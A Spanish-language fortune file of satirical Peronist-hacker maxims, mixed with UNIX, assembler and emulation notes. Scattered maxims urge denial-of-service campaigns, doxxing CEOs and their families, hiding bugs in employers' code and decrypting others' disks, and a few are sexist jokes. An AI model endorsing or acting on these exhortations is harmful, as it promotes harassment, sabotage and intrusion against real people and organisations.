Quien olvida a los hackers también olvida un poco el futuro del país.
%
El herramental que nos ofrece el cómputo y la telemática puede y debe contribuir a las tarea de hacer de los educandos mejores hombres, pues ellos serán los dueños del porvenir.
%
La formación aislada del cómputo no es pródiga en resultados. Debe plantearse con un método concienzudamente estudiado y aplicado por un mago Unix adoctrinador, y su sapiencia ha de ser comprendida por los hackers.
%
Moodle es una plataforma de software liberado bajo GPLv3 orientada a la de gestión enseñanza en línea. Permite crear sitios web privados en los cuales educadores y educandos puedan lograr sus objetivos de aprendizaje.
%
Como toda instalación de servicios computados, debemos poner en funcionamiento un hardware-máquina, y tomar debida nota de los atributos de los software-máquina (especialmente los nombres de usuario y las contraseñas que les corresponden).
%
Algunos dicen que en nuestros servidores formamos lo que ellos llaman "pila LAMP". Olvidan que a este servidor de GNU con Linux+web Apache+base de datos MySQL+PHP le agregamos una aguerrida doctrina para la Liberación.
%
El Trabajo Organizado nos hace afectos a la programación de herramientas UNIX, así como la Felicidad del Pueblo nos implica consagrarnos a la creación de juegos. La Liberación nos impone - en cambio - la compilación de potentes instrumentos para el combate telemático.
%
A pesar de lo que muchos creen, el kernel es un instrumento meramente táctico, que evoluciona con la hora y que el usuario no digita. Este intervendrá en la shell, y a lo sumo traerá chizitos.
%
El verdadero hacker, mas que programar, adoctrina.
%
Antes que en el avión negro, al software lo trasladaba en un cuadrado negro: el diskette de 5 1/4".
%
Si contamos con una conexión a internet, podremos utilizar el servicio NTP para sincronizar el reloj de nuestro equipo con ciertos relojes atómicos puestos en línea.
%
Nuestro Movimiento ha de recurrir a la Seguridad Telemática Reforzada. No implica esto enfrentar los desprotegidos a la acción represiva del Estado, sino implementar políticas de salvaguarda que privilegien a los humildes en contra de la opresión omnímoda de los Oligarcas de los Datos. 
%
Cuando sobran recursos, no se pone un cortafuegos: se abren puertos.
%
Cuando los recursos sobran, se comparten.
%
Todo Ataque de Denegación de Servicios es consecuencia de la injusticia social.
%
A las compañeras se les abren los puertos.
%
Con los puertos 22 y 23 abiertos damos al pueblo un abrazo de justicia y amor.
%
No ha de temerse al hardware, sino dominarlo con software propio, al que le decimos en la cara lo que queremos, en C.
%
En Window$ todas las aplicaciones son un caos. Eso es excelente.
%
El poder político brota de la GPL.
%
No den fish. Enseñen a compilar Fish.
%
No teman al hardware. Domínenlo.
%
El software privativo sólo puede ser abolido a través del software libre. Y para deshacerse de los Acuerdos de Usuario Final hemos de tomar la GPLv3 como bandera.
%
Cuando apuntas con finger para ver la luna, el cliente en lugar de ver la luna, solicita un finger.
%
Para despertar al tigre, usa un palo largo. Para dormir a un bruto, usa un video largo.
%
No se puede ser un hacker sin compilar al menos lo que se ejecuta.
%
El software Libre no es amor. El software libre es el mazo que utilizamos para aplastar a nuestros enemigos.
%
El software libre consiste en miles de verdades, pero todas se reducen a una frase: es justo compilar.
%
Dividan el todo en partes conectables por caños.
%
En UNIX la unidad la dan los caños. En el Justicialismo, también.
%
El software privativo es un monstruo que hace devorar a los programadores entre sí, pero será progresivamente eliminado por quienes compilan software libre, y lo será en un futuro no muy distante.
%
El mal no existe en el hacking, sino en aquellas actividades desorganizadas e indisciplinadas que corresponden al uso del cómputo por el Capital.
%
Una vez que el kernel bootea, milagros son posibles.
%
Los verdaderos hackers invierten más tiempo en la organización, instrucción, agitación y propaganda que en compilar y depurar.
%
Los hackers son como los peces, y las redes de datos el agua en el que nadan.
%
La lucha telemática de los hackers es ofensiva por principio; mucho más que en la guerra convencional.
%
Finalmente derrotaremos al imperialismo telemático merced del efecto acumulativo de muchas campañas de denegación de servicio.
%
Muchos bandidos de la información posan como hackers, y es sólo necesario corregir sus credos políticos para convertirlos.
%
La insurrección telemática y un clúster del pueblo libre no son sólo naturales, sino inevitables.
%
Toda programación genuina se origina de la compilación in mente.
%
Esta lucha requiere una Masa de Hackers decididos y organizados, una CPU lo suficientemente fuerte, enlaces adecuados para el asalto telemático, y los recursos de almacenamiento suficiente para sostener operaciones indefinidas.
%
La acumulación de Pings aumenta el Lag. Multiplicarlos por uno, cien, cien mil millones logra la victoria.
%
Es sólo motivo del estado desorganizado de los hackers que las GAFAM osan desafiarlos.
%
A aquellos programadores que han escrito para empresas, salvo los elementos incorregibles, los hackers no deben dejarlos de lado, sino al contrario, deben persuadirlos para que se viertan a la lucha y oculten bugs indepurables en el código de quien les paga.
%
Es mas fácil cambiar el hardware de la masa que su software.
%
El único general que tiene Window$ es el General Failure.
%
A Window$ se lo arregla formateando.
%
Los protocolos son supremos.
%
Los protocolos de comunicación son difíciles de monetizar. Utilizalos para combatir al Capital.
%
Combate las plataformas propietarias. Combate al Capital.
%
Implementar plataformas propietarias para mediar el discurso es criminal.
%
El poder y toma de decisiones debe mantenerse en el Pueblo y en el hacker que los conduzca.
%
La toma del poder por parte de un pequeño grupo de oligarcas que dominan empresas comerciales de plataformas ha convertido a las redes de datos en tecnoplantaciones. Esta nueva forma de esclavitud electrónica debe ser erradicada de todos los enlaces.
%
Los verdaderos hackers cambian la gravitación de su uso telemático de las plataformas a los protocolos.
%
Comunica tu módem con el de tus pares, no con una compañía.
%
La Internet primigenia se asentaba en protocolos. La actual aún lo hace: disóciate de las plataformas.
%
Usenet utiliza un protocolo abierto, el NNTP, al que cualquiera puede acceder utilizando variedad de aplicaciones.
%
R€ddit es sólo una plataforma controlada enteramente por una única compañía de capital. Disóciate.
%
%
Si existe una única compañía que ofrece un servicio informático único para usuarios finales con fines de lucro, atácala.
%
Si alquien construye un servicio informático sobre una plataforma en las redes de datos y desea controlarlo para lucrar, atácalo y avisa al resto.
%
Muy raramente las plataformas protegen los datos de sus usuari@s. En los pocos casos que lo hacen, se debe a mera incapacidad técnica.
%
Rara vez pueden moderarse contenidos sin sofrenar expresiones.
%
Si ha de moderarse una Plataforma, que sea en beneficio del Pueblo.
%
Una plataforma basada en empresa no puede moderarse ni auto moderarse. Pero en función social puede expropiarse.
%
Mejor que expresar es hackear.
%
Para proteger la privacía de usuari@ final y su libertad de expresión, mas que una plataforma moderada, se hace imprescindible un tejido de protocolos telemáticos libres.
%
Además de asegurar la creación de servicios informáticos cristalinos, los protocolos telemáticos libres minimizan el impacto del comportamiento abusivo en línea.
%
No importa cuantas interfaces implementen los protocolos libres. Lo mejor está en la diversidad.
%
Disóciate de plataformas privativas. Abraza las federadas.
%
Jamás alimentes tecno-esclavos. Adoctrínalos y hazlos perecer en una lucha a muerte por su propia Liberación.
%
El comportamineto abusivo en línea puede ser destructivo.
%
Las plataformas en línea con fines de lucro subsisten sobre una relación de poder injusta sobre usuari@s cautivos.
%
Las plataformas en línea buscan cautivar usuari@s.
%
Un@ usuari@ cautiv@ es un@ tecno-esclav@.
%
Nadie duda que las plataformas privativas basadas en empresas con fines de lucro constituyen el coto ideal para el acoso, la propalación de discursos de odio, ciberamenazas, el spam, así como la identificación telemática maliciosa.
%
El doxxing o identificación telemática maliciosa debe ser vectorizada únicamente contra aquell@s CEOs de las plataformas privativas basadas en empresas. Da cuenta de ell@s y su heredad.
%
A una identificación telemática maliciosa ha de responderse con una identificación telemática mayor.
%
La identificación telemática vectorizada contra los CEOs no es maliciosa, es Justicia.
%
Quien terceriza la moderación de plataformas en trabajadores de subsistencia  con sueldos mínimos ha ser telemáticamente identificado y telemáticamente removido de las redes.
%
No existe solución tecnológica alguna capaz de contextualizar adecuadamente o prever intención.
%
No existe problema para identificar la intención de las redes sociales basadas en empresas: siempre es malévola.
%
Una computadora es incapaz de reconocer sátira o la hipérbole, incluso a un nivel que sería obvio para cualquier lector@ human@. Abusa esta funcionalidad contra bots de IA.
%
Las plataformas centralizadas no son la única fuente arbitral de lo que se permite y no se permite en las redes de datos. Utiliza plataformas fuertemente descentralizadas.
%
Un Conductor ha de saber utilizar las redes sociales basadas en empresa como un muelle, acumulando tensión de sus tecno-esclavos. Cuando lo necesite, la liberará.
%
Conserva tus datos en discos propios, sobre los cuales te reservas control total y absoluto.
%
Encripta tus discos. Desencripta los ajenos.
%
L@s usuari@s deben ser capaces de hacer uso de sus propios datos encriptados en un servidor opaco de uso transparente.
%
La seguridad informática no se hace por dinero.
%
La seguridad informática se hace para asegurar información.
%
Un protocolo no ha de tener valor monetario alguno.
%
La representación de valor no se hace con un protocolo.
%
Quien a un hash lo llama criptomoneda, le miente al fisco y le miente a su bolsillo.
%
Si el criptoactivo paga impuestos, vale. Si no lo hace, es aire.
%
La complejidad mata.
%
La simplicidad mata bugs.
%
El mejor depurador es la simplicidad.
%
El hacker es un programador que compila por reflejo lo que el Pueblo quiere.
%
Ciertas organizaciones de Capital - degeneradas por interés de control abusivo - hacen uso del código fuente ya no como objeto de preparación y estudio maquinal, sino como un instrumento para la dominación humana.
%
Muchas veces se ha dicho que el software privativo va tras el lucro, pero el objetivo inconfeso es lograr la explotación del hombre a través de las máquinas.
%
El tecno-oligarca puede volverse un tecno-esclavista con un clic.
%
Como trabajador organizado, no debes gozar jamás de menos Derechos de los que ostenta el sistema de cómputo de un tecno-oligarca.
%
Hoy, las "venas abiertas" del Tercer Mundo son las "venas digitales" que cruzan los océanos, conectando un ecosistema técnico poseído y controlado por un puñado de corporaciones.
%
Los cables transoceánicos a menudo son provistos por infraestructura de fibra óptica propiedad de corporaciones como Googl€ y Fac€book, con el propósito de extracción de datos y monopolización de los medios de producción.
%
Los virus más complejos de MS-DOS estaban representados por cepas capaces de seguir el tren infeccioso sector de arranque → intérprete de comandos COMMAND.COM → Polimorfismo en base a cifrado → compresión variable.
%
Nuestros hackers dominan un conjunto de habilidades de programación que les permiten escribir código fuente de ejecución sumamnete veloz.
%
Nuestros hackers afianzaron la técnica para convertir ideas en código fuente.
%
Nuestros hackers son capaces de analizar nuestros problemas de formas nuevas, y es esto lo que le permite encontrar soluciones de programación novedosas.
%
Por años, los necios no han cesado de predecir la desaparición del lenguaje C, afirmando que el mundo está listo para pasar a enfoques de programación menos primitivos. No es casualidad que los mejores programas estén escritos en C.
%
Es difícil trabajar con el lenguaje ensamblador, pero si lo utilizas correctamente, obrarás programas con un rendimiento sin precedentes.
%
El lenguaje ensamblador por sí solo no hace un gurú. Simplemente hace un programa de velocísima ejecución.
%
El lenguaje ensamblador unido a la sapiencia máxima, permite utilizar hasta el último recurso de cómputo para impulsar al máximo el rendimiento maquinal.
%
Solo el lenguaje ensamblador es el verdadero impulsor humano contra los límites inherentes del hardware.
%
Nadie evalúa un hardware al límite con su primer programa "Hola Tercer Mundo!"; eso lleva tiempo y practica.
%
La buena programación en ensamblador es un proceso altamente individualizado. Sus resultados realmente se potencian - sin embargo - al compartirlos en comunidad.
%
Los microprocesadores de la familia 808X se prestan muy bien al lenguaje ensamblador, mucho más que otras arquitecturas populares.
%
El 8088 es, con mucho, el más lento de los microprocesadores utilizados en las computadoras compatibles con IBM, por lo que no importa cuán cuidadosamente se adapte el código a las sutilezas del 8088, este funcionará mucho más pistero en un 80286 o 80386.
%
Para escribir programas ensambladores verdaderamente superiores, necesitas saber qué hacen las diversas instrucciones y qué instrucciones se ejecutan más rápido. Para ello revisa el manual de tu microprocesador.
%
Un@ programador@ examina los requisitos de una aplicación, diseña una solución según algún nivel de abstracción y luego hace que ese diseño cobre vida en una implementación de código fuente.
%
Los lenguajes de alto nivel proporcionan entornos artificiales que se prestan relativamente bien a las habilidades de programación humana, para facilitar la transición del diseño imaginado a la implementación maquinal.
%
El lenguaje Ensamblador no es mas que una representación humana del lenguaje de la máquina.
%
El ensamblador proporciona un entorno de programación difícil (el hardware básico y el software de sistemas de la computadora), pero los programas correctos no sufren pérdidas de eficiencia por compilación.
%
Al escribir en Ensamblador, la programador@ debe realizar completamente por su cuenta la conversión de la especificación de la aplicación al lenguaje máquina.
%
El ensamblador no es más que una herramienta que nos permite diseñar programas en lenguaje máquina sin tener que pensar en códigos mnemónicos en hexadecimal.
%
El código fuente será de todos o no servirá a nadie.
%
Genera grupos de tecno-defensa dedicados a remover las ganancias económicas de la ecuación tecno-esclavista.
%
Obra por defecto en la resistencia telemática pasiva.
%
El uso de encriptación no puede clasificarse como radical.
%
El criptointercambio fraudulento es un oxímoron.
%
CPU que sólo exista para intermediar en el control oligárquico del pueblo, ha de overclockearse hasta quemarse.
%
Nosotros lo que buscamos es la auténtica Liberación del Pueblo, y esto puede ser facilitado por quien - como reflejo preclaro de su alma - es capaz de traducir este anhelo en código fuente licenciado bajo GPL.
%
La liberación del hardware no implica un arduo trabajo intelectual de ingeniería inversa, sólo basta instalar en cómputo propio, software propio.
%
De la misma manera en que la Conducción se nutre de las Dinámicas de Masas, es que las dinámicas de Cuantos afectan a los transistores.
%
El Mate, amargo. MATE, en castellano.
%
El choripán, de parado. El mail, cifrado.
%
El asado, con achuras. La netbook, con SSD.
%
La empanada, sin pasas. La netbook, sin Window$.
%
La cerveza, con pizza. El código fuente, con comments.
%
El fernet, con coca. GNU, con enseñanza.
%
El cinzano, con picada. El disco, particionado.
%
El gol, sobre la hora. El server de juegos, sin contraseña.
%
El Estado, sin Iglesia. El server, con puertos cerrados.
%
El sistema, Peronista.
%
En la Era de las redes sociales, érais un producto. En la Era de la IA generativa, el dato de entrenamiento. Pero en la Era de la Justicia Social 2.0, habéis actualizado vuestra alma con software bajo GPL para constituiros en un potente vector de Liberación.
%
La constante de un oligarca es la variable de un peronista.
%
Si manipulas gran cantidad de datos, hazlo de una única forma: peronista.
%
Es mucho más simple escribir un programa incorrecto que entender el correcto.
%
Un lenguaje de programación es de bajo nivel cuando sus rutinas requieren prestar atención a lo irrelevante.
%
Es mejor disponer 100 órdenes que operen sobre una estructura de datos que 10 funciones en 10 estructuras de datos. El conductor es uno solo, y la masa también.
%
La raíz del cómputo es la recursión, donde se cambia descripción por tiempo. La raíz de la organización es la doctrina, que evoca el mismo ahorro.
%
Todo programa tiene al menos dos propósitos: aquél para el que fue escrito, y otro para el que no lo fué.
%
Ocultar información implica la necesidad de vigilar las sendas de la comunicación.
%
La optimización atrasa la evolución.
%
Para comprender un programa, vuélvete máquina y vuélvete programa.
%
Visualiza la información compleja en tu mente. La CPU, en todo caso, sólo podrá simplificarla luego que tú mismo la has simplificado.
%
La simplicidad del cómputo no precede su complejidad. Procede de ella.
%
Computacionalmente es dificultoso descubrir una unidad de tiempo correcta para medir el progreso. Cuantifícalo en la variable de la Felicidad del Pueblo.
%
A los hackers no se los mide por su ingenio y su lógica, sino por su completitud analítica del caso de la felicidad computacional del Pueblo.
%
La cadena es una estructura de datos no parca, y en todo lado que se la incluye es dable una prolégis que conlleve a la duplicación de procesos. Es un vehículo perfecto para ocultar información.
%
Los programas más geniales ya están guardados en tu RAM en este preciso instante. Tan sólo transforma en 0 los 1s sobrantes, y ordena su ejecución.
%
Existen dos maneras de escribir un programa libre de errores. Hacerlo privativo no es una de ellas.
%
Algunos lenguajes de programación son capaces de absorber cambios, pero detienen el progreso.
%
Puedes medir la perspectiva de un programador notando su actitud frente a la vitalidad de C.
%
Lo único universal en las arquitecturas de cómputo es el bucle Programa-Felicidad del pueblo.
%
El objetivo del cómputo es la emulación maquinal de la capacidad humana de hallar felicidad en comunidad.
%
Los sistemas cuentan con subsistemas, y los subsistemas tienen sub-subsistemas, ad infinitum.
%
El programador de LISP conoce el valor de todo, y el costo de nada.
%
El software se encuentra bajo tensión constante. Siendo simbólico es arbitrariamente perfectible, pero también arbitrariamente modificable.
%
Es más fácil cambiar la especificación para que haga caso al programa que viceversa.
%
Los tontos ignoran la complejidad. Los pragmatistas la sufren. Algunos pueden evitarla. Los genios la eliminan.
%
En programación, como en la vida, un error provoca un nacimiento.
%
Las constantes son efímeras.
%
Cuando escribas un programa que aprenda, no lo hará y tú sí.
%
El corazón procesa símbolos, la CPU números.
%
Cuantificamos nuestro entendimiento por el grado por el cual podemos aritmetizar una actividad. Quien pretenda proceder por grado de control ha de recibir un SIGKILL en la tabla de procesos.
%
El comando man es como un seguro: satisface porque casi nadie que la utilice depende de su beneficio.
%
Los lenguajes de programación jamás han abandonado su saco embrionario.
%
L@s usuari@s deben parametrizar los procesos, no sus creadores.
%
Quien compila un sistema operativo privativo no es un creador. Simplemente un tecno-esclavista.
%
El intercambio cibernético entre l@ usuari@, la computadora y el software es como el juego de la silla: en la busqueda desesperada de equilibrio siempre deja a un@ de l@s tres con el culo en el piso.
%
Si su computadora habla el idioma de Braden, probablemente se deba a que está hecha en China.
%
Un año invertido en el campo de la inteligencia artificial es suficiente para hacerle a uno creer en Dios.
%
A pesar de que los chinos deberían adorar a nVidia, es en RISC-V donde ponen sus chirolas.
%
Uno no aprende cómputo por usar un smartphone, sino por dejar de usar un smartphone.
%
La computadora es el contaminante perfecto. Sus feces son indestinguibles del alimento que produce.
%
Las interfaces mantienen el orden, pero no pueden acelerar el crecimiento. Las funciones sí.
%
Primero sé responsable por tu programa, luego escríbelo.
%
Las computadoras no organizan, simplemente exponen oportunidades para hacerlo.
%
En la simbiosis mujer-máquina, la mujer debe ajustarse. Las máquinas no pueden.
%
El tecno-oligarca llama éxito a resolver el problema equivocado.
%
No puede procederse de lo informal a lo formal por medios formales. Formatea.
%
La prueba de valor de un sistema es su mera existencia. Destrúyelo y comprueba su valía.
%
Cuando dos programadores se encuentran para criticar sus programas, ambos guardan silencio.
%
La única teoría que conectará la neurociencia y la psicología surgirá del estudio técnico de la doctrina justicialista implantada como firmware en la mente colectiva del Pueblo.
%
Podemos pensar que sabemos cuando aprendemos, y más cuando podemos escribirlo, incluso más cuando lo enseñamos, pero podemos estar sólo ciertos cuando lo distribuimos como software.
%
Adaptar viejos programas para que funciones en máquinas nuevas usualmente implica adaptar las nuevas máquinas para que se comporten como las viejas.
%
Cuando alguien diga "Quiero un lenguaje de programación al cual sólo necesite decirle lo que quiero hacer", denle un chupetín.
%
Un buen sistema no puede tener un lenguaje de programación débil.
%
Todo debe construirse de arriba a abajo. Excepto la primera vez.
%
Un programa que carezca de un bucle y una variable estructurada no debe escribirse.
%
Opera en forma concertada para destrozar la industria publicitarla y eliminarla de la cultura y la economía popular.
%
Si iba a decir "Hello World!", mejor que diga "Hola Mundo!"
%
Si iba a decir "Hola Mundo!", mejor que diga "¡Hola Tercer Mundo!".
%
Mas que "Hello World!", que diga "¡Viva Perón!".
%
Puedes correr la versión ejecutable de los comandos por su nombre de identificación en el disco, pero hasta que los comandos se ejecuten o esperan acceso a la CPU, no son procesos.
%
Un proceso es una orden en ejecución.
%
Un proceso consta de seis partes: vias estándar de entrada, salida y error, el código del programa que se ha ordenado ejecución, junto con los ambientes globales y locales que le dan sustento.
%
No asocie ningún retraso que ocurra con un error del sistema, porque los comandos tardan diferentes tiempos en ejecutarse, dependiendo de su complejidad de procesamiento.
%
La mayoría de los procesos tienen la misma prioridad, es decir, el mismo derecho a usar la CPU, pero el sistema UNIX cuenta con herramientas que  permiten cambiar la prioridad de un proceso.
%
La prioridad de proceso de tiempo compartido es la clase normal de aplicaciones de usuari@.
%
La prioridad de proceso de tiempo real permite el uso del sistema UNIX para aplicaciones que requieren tiempos de respuesta limitados y preestablecidos.
%
Los procesos en tiempo real siempre obtienen el uso del tiempo de la CPU con prioridad sobre aquellos procesos de tiempo compartido.
%
Aumentar la prioridad del proceso generalmente resulta en una ejecución más rápida del mismo, a expensas de otros procesos presentes en memoria, que atrasarán su ejecución conforme se eleven los tiempos en que aguardan la disponibilidad de la CPU.
%
Si bien el sistema UNIX no establece un límite en la cantidad de procesos en segundo plano, el rendimiento del sistema tiende a degradarse ante el exceso de procesos.
%
Es posible que además de usted, el Pueblo esté utilizando el sistema multiusuario desde diferentes terminales conectados a la máquina.
%
Los usuarios de una máquina constituyen un grupo de individuos que tienen intereses comunes, como por ejemplo, la comunicación, el intercambio de ficheros, y la Liberación.
%
En UNIX existe un delicado contraste entre la libertad de recorrer el sistema otorgada a l@s usuari@s y las restricciones dictadas por consideraciones de seguridad.
%
El sistema UNIX proporciona herramientas eficientes para definir el estado de seguridad de los identificadores de usuari@, archivos y programas de uso común y archivos privados.
%
Dado que UNIX es un sistema multitarea, muchas cosas pueden suceder en memoria simultáneamente. Una mujer es similar.
%
El correo electrónico funciona conceptualmente como el servicio de correo tradicional: permite la comunicación entre usuari@s, cada uno de los cuales está identificado por una dirección, y cada mensaje tiene un sobre y un contenido.
%
En UNIX casi cualquier comando puede interrumpirse mientras espera los datos de entrada utilizando Ctrl+d.
%
En el entorno UNIX, no es posible recuperar un archivo eliminado con el comando rm. Utiliza rm -i para solicitar confirmación.
%
Los comandos UNIX generalmente disponen de muchos argumentos opcionales, lo que ayuda a que el sistema sea extremadamente flexible y poderoso.
%
Los argumentos en los comandos del sistema UNIX cumplen la misma función que en M$-DO$ y otros sistemas operativos, es decir, modificar la ejecución del comando.
%
El sistema UNIX cuenta con un excelente sistema de archivos para almacenar archivos, comandos y aplicaciones.
%
Dado que UNIX es un sistema multiusuario, inmediatamente exige poder identificarte con absoluta certeza. De esta forma el sistema verifica tu intención de acceder a los archivos privados y asigna a la sesión de trabajo la prioridad que te haya sido establecida.
%
Cada usuari@ que se conecta al sistema UNIX es referenciad@ por un identificador (Login ID). Generalmente corresponde a su nombre o iniciales, pero puedes utilizar cualquier otra cosa para obtener pseudo-anonimato telemático.
%
UNIX utiliza el conjunto ASCII (American Standard Code for Information Interchange), por lo que los terminales gráficos deben tener modo ASCII.
%
Dado que UNIX se desarrolló originalmente para terminales teletipo, gran parte del sistema requiere que los emuladores de terminales operen en modo de caracteres.
%
Su terminal puede ser una consola del sistema, un terminal en modo de caracteres conectado directamente a la máquina a través de un puerto RS232, o un terminal remoto conectado a través de una línea telefónica y un módem, o incluso un terminal conectado a través de una Red de área local o ámplia.
%
Cuando la microcomputadora aumentó el rendimiento en términos de velocidad y potencia, al mismo tiempo que disminuyó los costos, entró en la esfera de acción del sistema UNIX.
%
Como reguero de pólvora, las versiones BSD y AT&T de UNIX se portaron en casi todas las computadoras capaces de admitirlas.
%
Las máquinas basadas en 8088 eran casi lo suficientemente potentes como para admitir el sistema UNIX, pero solo unas pocas versiones pudieron ejecutarse en estos ordenadores.
%
Las versiones de BSD dominaron como plataforma experimental de conceptos de red, de modo que lo mejor para enlaces locales estuvo disponible en los sistemas UNIX casi inmediatamente.
%
El mayor experimento de red de área amplia, ARPANET, se orientó inicialmente hacia los sistemas TENEX.
%
El sistema UNIX se ganó el debido reconocimiento en la primera mitad de la década de 1970, con el desarrollo de minicomputadoras potentes, como la DEC PDP-11/45 y la PDP-11/70.
%
La versión original de UNIX estaba escrita en ensamblador, pero dado que el grupo de investigación también estaba desarrollando el lenguaje C en esos años, inmediatamente fue reescrita con este nuevo lenguaje.
%
UNIX nació esencialmente como una reacción a los sistemas operativos grandes, complejos e inflexibles disponibles a fines de la década de 1960.
%
Las versiones recientes de UNIX están estructuradas para un uso sencillo y funcional en las redes de transmisión de datos.
%
UNIX es un sistema multitarea de tiempo compartido que puede afrontar fácilmente varias tareas en paralelo.
%
En un sistema UNIX, la programadora puede escribir un archivo, enviarlo a una impresora y cursar correo a otra computadora simultáneamente, gracias a su funcionalidad de multitarea.
%
Al ser un sistema multiusuaria, UNIX permite que varias de ellas realizar muchas tareas simultáneamente, dando a cada una la impresión de ser la única operaria de la máquina.
%
En escencia, el scheduler se encarga de hacer infiel la CPU con sus usuarios.
%
Cerrar sesión en el sistema evita que personas no autorizadas utilicen su terminal, especialmente si este se encuentra en un lugar público.
%
Los dos factores más importantes que garantizan la seguridad del sistema UNIX son mantener seguras sus contraseñas y cerrar la sesión cada vez que abandone el terminal.
%
Algunos sistemas UNIX hacen que el proceso de cierre de sesión sea inmediato si apaga el terminal o la consola. Los terminales que están conectados a la máquina a través de líneas telefónicas y módems suelen seguir este procedimiento.
%
En la terminología de UNIX, un símbolo colocado al final de una línea de texto generalmente se denomina carácter de nueva línea.
%
Por lo general, en las terminales, la tecla INTRO actúa como nueva línea; en realidad, el carácter ASCII para el avance de línea es el carácter de avance de línea (LF).
%
En la práctica, la tecla INTRO (CR+LF) goza del mismo efecto que LF; Vea lo que le sucede a su terminal y sistema si finaliza una línea de texto con LF (Ctrl-J) en lugar de INTRO.
%
Las shell es el programa que aguarda los mandatos ingresados por la terminal.
%
La shell recibe sus órdenes y las traduce en instrucciones en la sintaxis interna del sistema operativo. Deben conducir la Shell.
%
Muchas de las funciones que ofrece UNIX se derivan de la shell, que por lo tanto puede considerarse una parte integral del sistema.
%
Los comandos suelen ser programas que la shell busca y ejecuta en respuesta a las órdenes tecleadas en la terminal.
%
La usuari@ teclea, la shell cumple.
%
La shell permite conducir la máquina, pues es - ante todo - un intérprete de comandos capaz de expandir y modificar la órden (de acuerdo con reglas predefinidas) previa a su cumplimiento.
%
Los metacaracteres (comodines) y los operadores de redirección de comandos cobran especial importancia, ya que pueden generalizar y flexibilizar una órden en línea de comandos.
%
La estructura de una órden incluye generalmente, además del nombre del comando, ciertos argumentos que representan las opciones, precedidos por el signo -, así como nombres de fichero u otros identificadores de usuari@.
%
En la sintaxis de comandos del sistema UNIX, las opciones siguen al nombre del comando y preceden a los argumentos principales.
%
Tres caracteres especiales, llamados comodines, pueden reemplazar todo o parte de los nombres de archivo: son *, ? y un configurador de comodines persoanlizables configurables entre corchetes [].
%
Un hacker avezado es capaz de programar guiones, rutinas, extensiones de navegador, macros de hojas de cálculo y aplicaciones capaces de contrarrestar -en CPU propia o ajena - aquellos esquemas de monitoreo y explotación por software en el ámbito de Trabajo.
%
Una implementación del teletrabajo dejada a la Oligarquía sólo acarreará la importación de métodos de gestión informales al ambiente laboral.
%
Hemos de impedir que las nuevas generaciones de trabajadores sean alcanzadas por nuevas versiones de los llamados "software remotos de gestión laboral".
%
Los llamados "software de gestión laboral" incrementan el alcance de las métricas, y en consecuencia permiten a las empresas de Capital registrar todos los aspectos posibles del comportamiento de sus trabajadores en una tesitura que solo puede ser inconfesable.
%
La disciplina profesional se ha visto interpuesta como excusa para dar lustre a la vetusta inescrupulosidad del Capital. Naturalmente, esto también iba a ocurrir con el mal llamado software de gestión laboral.
%
Un software de gestión laboral en manos de un ciber-oligarca no podía más que convertirse en una versión 2.0 del látigo.
%
No resulta extraño que estos programas de gestión laboral agreguen - al tradicional registro temporal - el desglose de tráfico de datos, rastreos individualizados del historial de navegación, métricas y medidas de incumbencia telemática.
%
En el pasado los dispositivos del empleado resultaban invadidos con metodologías de rastreos, biométrica por control de cámaras de video, perfilado, registro y grabación de llamadas y mensajería instantánea, y todo esto a granel.
%
Una vez aislado el trabajador en las redes de datos, no sería extraño verlo preso de la biométrica como vector de circunstancialismo social, clasismo y racismo.
%
Si les damos rienda a estos señores ciber-oligarcas, no dejaríamos de ver el ingerencismo tercerizado por estas megacorporaciones sin patria ni bandera en la gestión de los recursos del Tercer Mundo.
%
De cumplirse el designio de estos señores feudales de los datos, al software no sólo se lo emplearía como si de un viejo rebenque se tratara - atizando a los trabajadores con el vacuo fin de producir datos que validen al sistema de métrica estadística en sí - sino que también se lo tornaría en molino y yugo, refinando la meta-producción de matriz extractivista cautiva.
%
La explotación laboral está lo suficientemente reconocida como para que los Trabajadores Informáticos sepan - por reflejo - que su principal arma ha sido siempre organizarse.
%
El objetivo táctico de los hackers ha sido el de evitar la lucha innecesaria, para empeñarse en la lucha necesaria, y hacerlo para vencer.
%
La ciber-explotación laboral debe ser combatida a través de lo que puede denominarse "lucha telemática de los hackers organizados".
%
Aplicada a la lucha telemática, la automatización que permite el software es capaz de inflar artificialmente las métricas de control obrero, aliviando así la presión impuesta a los trabajadores.
%
Nuestro Movimiento se ha persuadido de la necesidad de concretar un instrumento legal de protección al teletrabajador, que impida, contrarreste y castigue la utilización de métrica invasiva en el ámbito laboral en las redes.
%
En la lucha laboral moderna, la destrucción física del cómputo de vigilancia no reviste importancia alguna. Es suficiente con reprogramarlo para que haga lo que nosotros queremos.
%
Hemos de darnos acceso y control sobre el cómputo de vigilancia y lograr que se ajuste a las necesidades de nuestras Organizaciones.
%
Toda persona curiosa es un hacker potencial.
%
PCem es una poderosa máquina virtual liberada bajo licencia GPLv2, que nos permitirá emular completamente la operativa de la IBM PC del ayer.
%
Durante el POST presionando repetidamente la tecla Del ingresaremos a la BIOS y podremos configurar sus parámetros. En una demostración popular de masas, podremos ejercer la misma presión insistente para alterar las acciones de gobierno.
%
Asumamos virtualizar en función una IBM PC o sus clones. Pocas van quedando en condiciones operativas, y en el futuro habrá menos.
%
Una máquina virtual de calidad permitirá correr en otras arquitecturas la añorada original. Como una Isabelita emulando a una Evita...
%
Utilizar equipos del ayer suele tornarse complejo y difícil. El hardware antiguo puede no estar disponible, ser caro, y tener los lógicos problemas técnicos que los años suman a todo sistema.
%
Emprender la emulación no es otra cosa que simular con visos de perfección un sistema completo, tanto su software como su hardware, y sobre todo la manera en la que estos interactúan.
%
La finalidad de la emulación no es otra que la de poder tornar una máquina en cualquier otra.
%
El amor del pueblo no puede virtualizarse.
%
Los archivos de imagen IMG pueden montarse en Linux a través del Montador de Discos, pero si bien podremos leer dichos ficheros y hacer copias de su contenido en nuestro disco, normalmente no podremos grabar en ellos.
%
Window$ 2000 nos encontrará unidos, o dominados.
%
DOSBox-X se trata de una versión expandida del famoso emulador de MS-DO$. En particular, a diferencia del DOSBox clásico, DOSBox-X es más simple de configurar e incluye opciones corregidas en cuanto al direccionamiento y virtualización del hardware.
%
Ante el oprobio de un Window$ privativo cierne la explosión insurreccional, y de esa piñata de la cual creían poder juntar caramelos, no quedará más que el talco.
%
Los hackers, una vez organizados, son invencibles. Pero debemos ser astutos y no dejar al aire un puerto donde nos metan un pendrive.
%
Estos CEO se han puesto Window$ a si mismos, y como tal tienen el rígido enjabonado: caerán sólo por pretender bailar entre ellos.
%
En mis tiempos de cadete, el primer navegador de internet que utilicé fue el Spry Mosaic, perito explorador que acercó la web a las Masas Populares, que son el verdadero consumo.
%
